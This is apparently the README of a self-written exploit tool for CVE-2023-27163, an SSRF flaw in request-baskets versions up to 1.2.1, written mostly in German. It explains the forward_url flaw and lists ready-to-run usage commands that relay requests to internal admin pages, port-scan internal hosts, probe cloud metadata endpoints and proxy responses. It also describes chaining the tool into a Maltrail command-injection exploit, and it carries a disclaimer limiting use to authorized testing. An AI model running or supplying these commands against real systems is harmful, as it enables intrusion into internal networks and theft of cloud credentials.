
Ich habe diesen Exploit geschrieben, um CVE-2023-27163 anzugreifen, eine Server-Side Request Forgery (SSRF) Sicherheitslücke, die in request-baskets Versionen ≤ 1.2.1 vorkommt. Der Fehler liegt im Endpunkt /api/baskets/{name}, wo der Parameter forward_url es einem Angreifer ermöglicht, den Server dazu zu bringen, in seinem Namen beliebige HTTP-Anfragen zu stellen.
Der Exploit erstellt einen bösartigen "Basket", der mit einer forward_url konfiguriert ist, die auf ein internes Ziel zeigt. Jede Anfrage an den Endpunkt dieses Baskets wird vom Server an die angegebene URL weitergeleitet, wodurch der Server effektiv zu einem SSRF-Proxy wird.
requests-Bibliothek (pip install requests)usage: exploit.py [-h] -t TARGET [-f FORWARD_URL] [--proxy-response]
[--insecure-tls] [--no-expand-path] [--capacity CAPACITY]
[--scan-host SCAN_HOST] [--ports PORTS] [--scan]
[--discover] [--cloud-metadata] [--timeout TIMEOUT]
[--delay DELAY]
# Basic SSRF forward to an internal service
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80/admin
# Port scan an internal host
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 127.0.0.1 --scan
# Probe cloud metadata endpoints
python3 exploit.py -t http://192.168.1.100:55555 --cloud-metadata
# Proxy mode (returns the forwarded response body)
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80 --proxy-response
# Custom port range scan
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 10.0.0.2 \
--ports 80,443,3000,5000,8000,8080,9000
Ich habe dieses Tool nur für Bildungszwecke und autorisierte Sicherheitstests erstellt. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.
Dieser SSRF-Exploit kann als erster Einstiegspunkt verwendet werden, um interne Dienste zu erreichen, die nicht direkt exponiert sind. Ich habe ihn entwickelt, um mit dem Maltrail-v0.53-Exploit zusammenzuarbeiten — der SSRF-Tunnel ermöglicht es, eine auf localhost laufende Maltrail-Instanz anzusteuern und dadurch die Befehlsinjektion auszulösen.# CVE-2023-27163-exploit